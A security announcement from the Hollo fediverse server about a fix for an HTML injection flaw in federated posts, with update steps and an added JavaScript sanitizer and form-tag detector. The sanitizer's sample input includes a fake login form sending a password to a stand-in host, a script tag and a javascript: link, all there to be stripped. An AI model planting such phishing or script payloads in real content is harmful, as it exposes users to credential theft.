@hollo@hollo.social

🚨 Security Update: Hollo 0.6.5 Released

We've released 0.6.5 with a critical fix for CVE-2025-53941, addressing an HTML injection vulnerability in federated posts.

Please update immediately to protect your instance from potential phishing and XSS attacks.

How to update:

  • Railway: Go to deployments → click three dots → Redeploy
  • Docker: docker pull ghcr.io/fedify-dev/hollo:latest and restart
  • Manual: git pull origin stable && pnpm install and restart server

github.com

Posts received with form elements are rendered allow submission

### Summary When an incoming post has form elements included, the elements are rendered and are submittable. Other platforms normally remove such elements before rendering. Please note that I a...

1 reply
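The advisory linked above says that other platforms remove form elements from incoming posts before rendering them. The following is an added illustration of that defensive step, not Hollo's own code and not the actual fix shipped in 0.6.5: an allowlist-based sanitizer that re-escapes text, keeps only a small set of inline tags, drops form controls (form, input, button, select, textarea) together with script/style content, and only lets plain http(s) links through. A second helper reports which form-related tags an incoming post carried, which is handy for logging or alerting on the inbox side. The tag lists, helper names (sanitizeHtml, findFormControls) and the sample post are assumptions made for this example; a production deployment would rely on a maintained sanitizer library rather than a hand-rolled tokenizer like this one.

```javascript
// Added example, not Hollo's code: allowlist-based sanitizer for federated post HTML.
// Assumptions: plain Node.js, no DOM; tag/attribute lists below are illustrative.

const ALLOWED_TAGS = new Map([
  ["p", []], ["br", []], ["span", []], ["strong", []], ["em", []],
  ["b", []], ["i", []], ["u", []], ["ul", []], ["ol", []], ["li", []],
  ["blockquote", []], ["code", []], ["pre", []], ["a", ["href"]],
]);

// Elements whose text content is dropped as well, not just their tags.
const DROP_WITH_CONTENT = new Set(["script", "style", "iframe", "object", "embed"]);

// Form-related tags that the advisory says should never reach the renderer.
const FORM_TAGS = new Set(["form", "input", "button", "textarea", "select", "option", "label", "fieldset"]);

const TAG_RE = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
const ATTR_RE = /([a-zA-Z][a-zA-Z0-9-]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Escape text nodes; existing entities such as &amp; are left intact.
function escapeText(text) {
  return text
    .replace(/&(?![a-zA-Z]+;|#\d+;|#x[0-9a-fA-F]+;)/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

function parseAttrs(raw) {
  const attrs = {};
  for (const m of raw.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Accept only absolute http(s) URLs; javascript:, data: and friends are rejected.
function safeHref(value) {
  const v = value.trim();
  return /^https?:\/\/[^\s"'<>]+$/i.test(v) ? v : null;
}

function renderTag(name, attrs) {
  const parts = [name];
  for (const attrName of ALLOWED_TAGS.get(name)) {
    if (attrName === "href" && "href" in attrs) {
      const href = safeHref(attrs.href);
      if (href !== null) parts.push(`href="${escapeText(href).replace(/"/g, "&quot;")}"`);
    }
  }
  if (name === "a") parts.push('rel="nofollow noopener noreferrer"');
  return `<${parts.join(" ")}>`;
}

function sanitizeHtml(html) {
  let out = "";
  let last = 0;
  let skipping = null; // name of the DROP_WITH_CONTENT element we are inside, if any
  for (const m of html.matchAll(TAG_RE)) {
    const [full, slash, rawName, rawAttrs] = m;
    const name = rawName.toLowerCase();
    if (!skipping) out += escapeText(html.slice(last, m.index));
    last = m.index + full.length;
    if (skipping) {
      if (slash && name === skipping) skipping = null;
      continue;
    }
    if (DROP_WITH_CONTENT.has(name)) { if (!slash) skipping = name; continue; }
    if (!ALLOWED_TAGS.has(name)) continue; // form, input, button, ... are dropped here
    out += slash ? `</${name}>` : renderTag(name, parseAttrs(rawAttrs));
  }
  if (!skipping) out += escapeText(html.slice(last));
  return out;
}

// Inbox-side check: which form-related tags did the raw post contain? (sorted, unique)
function findFormControls(html) {
  const found = new Set();
  for (const m of html.matchAll(TAG_RE)) {
    const name = m[2].toLowerCase();
    if (FORM_TAGS.has(name)) found.add(name);
  }
  return [...found].sort();
}

// Constructed sample: a post that smuggles a login form, a script and a javascript: link.
const SAMPLE_POST =
  '<p>Hello <strong>fediverse</strong>!</p>' +
  '<form action="https://evil.example/steal" method="post">' +
  '<input name="password" type="password"><button>Log in</button></form>' +
  '<script>alert(1)</script>' +
  '<a href="javascript:alert(1)">click</a> <a href="https://example.org/">site</a>';

console.log("form controls seen:", findFormControls(SAMPLE_POST));
console.log(sanitizeHtml(SAMPLE_POST));
```

The detector runs on the raw HTML before sanitization, so an instance can count or log posts that arrived with form markup even though the renderer never shows it; the sanitizer keeps the harmless text inside a dropped button ("Log in") but removes everything a user could submit.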

@hollo@hollo.social · Reply to Hollo :hollo:

🚨 Security Update: Hollo 0.6.5 Released

We have released 0.6.5, which fixes the CVE-2025-53941 vulnerability. The HTML injection vulnerability in federated posts has been fixed.

Please update immediately to protect your instance from phishing and XSS attacks.

How to update:

  • Railway: Deployments tab → click the three dots → Redeploy
  • Docker: docker pull ghcr.io/fedify-dev/hollo:latest and then restart
  • Manual: git pull origin stable && pnpm install and then restart the server
